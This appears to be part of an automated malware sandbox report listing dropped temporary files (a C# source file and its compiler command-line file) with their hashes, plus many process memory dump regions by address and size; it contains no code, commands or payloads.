\??\c:\Users\Admin\AppData\Local\Temp\nlr5dc5q\nlr5dc5q.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nlr5dc5q\nlr5dc5q.cmdline

Filesize
607B

MD5
6229c0e57841d6b02f765d52f7f8b12d

SHA1
105af5696b8cc866aab53cb5efe0361da498e574

SHA256
b93ab8b1554e65ee7e7f0a258f8d2a366f798094f5075b8ef5324566dda79657

SHA512
e08c6dfb1865d259ae74464df55986b52a794295a5e16a4199a6bc29e46023efa7b93137501cf1d027214380a29fa805c7eb6e16ae49e2528ea5f8cbdd05cdfc

Download Submit
memory/2332-95-0x00000173B6C40000-0x00000173B6C62000-memory.dmp

Filesize
136KB

Download
memory/4440-54-0x00007FF984B80000-0x00007FF984BAC000-memory.dmp

Filesize
176KB

Download
memory/4440-70-0x00007FF980250000-0x00007FF9806B5000-memory.dmp

Filesize
4.4MB

Download
memory/4440-117-0x00007FF980910000-0x00007FF980A81000-memory.dmp

Filesize
1.4MB

Download
memory/4440-72-0x0000017D7C120000-0x0000017D7C497000-memory.dmp

Filesize
3.5MB

Download
memory/4440-73-0x00007FF97FED0000-0x00007FF980247000-memory.dmp

Filesize
3.5MB

Download
memory/4440-25-0x00007FF980250000-0x00007FF9806B5000-memory.dmp

Filesize
4.4MB

Download
memory/4440-77-0x00007FF980D90000-0x00007FF980DA5000-memory.dmp

Filesize
84KB

Download
memory/4440-78-0x00007FF984B80000-0x00007FF984BAC000-memory.dmp

Filesize
176KB

Download
memory/4440-81-0x00007FF97FDB0000-0x00007FF97FEC8000-memory.dmp

Filesize
1.1MB

Download
memory/4440-255-0x00007FF984310000-0x00007FF98433E000-memory.dmp

Filesize
184KB

Download
memory/4440-256-0x00007FF984250000-0x00007FF984307000-memory.dmp

Filesize
732KB

Download
memory/4440-79-0x00007FF984B70000-0x00007FF984B7D000-memory.dmp

Filesize
52KB

Download
memory/4440-74-0x00007FF989FF0000-0x00007FF98A014000-memory.dmp

Filesize
144KB

Download
memory/4440-71-0x00007FF984250000-0x00007FF984307000-memory.dmp

Filesize
732KB

Download
memory/4440-66-0x00007FF984310000-0x00007FF98433E000-memory.dmp

Filesize
184KB

Download
memory/4440-64-0x00007FF98A050000-0x00007FF98A05D000-memory.dmp

Filesize
52KB

Download
memory/4440-62-0x00007FF984AF0000-0x00007FF984B09000-memory.dmp

Filesize
100KB

Download
memory/4440-60-0x00007FF980910000-0x00007FF980A81000-memory.dmp

Filesize
1.4MB

Download
memory/4440-58-0x00007FF985990000-0x00007FF9859AE000-memory.dmp

Filesize
120KB

Download
memory/4440-56-0x00007FF985A50000-0x00007FF985A68000-memory.dmp

Filesize
96KB

Download
memory/4440-105-0x00007FF985990000-0x00007FF9859AE000-memory.dmp

Filesize
120KB

Download
memory/4440-32-0x00007FF98A090000-0x00007FF98A09F000-memory.dmp

Filesize
60KB

Download
memory/4440-271-0x0000017D7C120000-0x0000017D7C497000-memory.dmp

Filesize
3.5MB

Download
memory/4440-175-0x00007FF984AF0000-0x00007FF984B09000-memory.dmp

Filesize
100KB

Download
memory/4440-282-0x00007FF97FED0000-0x00007FF980247000-memory.dmp

Filesize
3.5MB

Download
memory/4440-298-0x00007FF985990000-0x00007FF9859AE000-memory.dmp

Filesize
120KB

Download
memory/4440-293-0x00007FF980250000-0x00007FF9806B5000-memory.dmp

Filesize
4.4MB

Download
memory/4440-294-0x00007FF989FF0000-0x00007FF98A014000-memory.dmp

Filesize
144KB

Download
memory/4440-299-0x00007FF980910000-0x00007FF980A81000-memory.dmp

Filesize
1.4MB

Download
memory/4440-308-0x00007FF980250000-0x00007FF9806B5000-memory.dmp

Filesize
4.4MB

Download
memory/4440-318-0x00007FF984250000-0x00007FF984307000-memory.dmp

Filesize
732KB

Download
memory/4440-323-0x00007FF97FED0000-0x00007FF980247000-memory.dmp

Filesize
3.5MB

Download
memory/4440-334-0x00007FF980D90000-0x00007FF980DA5000-memory.dmp

Filesize
84KB

Download
memory/4440-333-0x00007FF984B70000-0x00007FF984B7D000-memory.dmp

Filesize
52KB

Download
memory/4440-332-0x00007FF984310000-0x00007FF98433E000-memory.dmp

Filesize
184KB

Download
memory/4440-331-0x00007FF98A050000-0x00007FF98A05D000-memory.dmp

Filesize
52KB

Download
memory/4440-330-0x00007FF984AF0000-0x00007FF984B09000-memory.dmp

Filesize
100KB

Download
memory/4440-329-0x00007FF980910000-0x00007FF980A81000-memory.dmp

Filesize
1.4MB

Download
memory/4440-328-0x00007FF985990000-0x00007FF9859AE000-memory.dmp

Filesize
120KB

Download
memory/4440-327-0x00007FF985A50000-0x00007FF985A68000-memory.dmp

Filesize
96KB

Download
memory/4440-326-0x00007FF984B80000-0x00007FF984BAC000-memory.dmp

Filesize
176KB

Download
memory/4440-325-0x00007FF98A090000-0x00007FF98A09F000-memory.dmp

Filesize
60KB

Download
memory/4440-324-0x00007FF989FF0000-0x00007FF98A014000-memory.dmp

Filesize
144KB

Download
memory/4440-322-0x00007FF97FDB0000-0x00007FF97FEC8000-memory.dmp

Filesize
1.1MB

Download
memory/4440-30-0x00007FF989FF0000-0x00007FF98A014000-memory.dmp

Filesize
144KB

Download
memory/4532-192-0x000001ED746E0000-0x000001ED746E8000-memory.dmp

Filesize
32KB

Download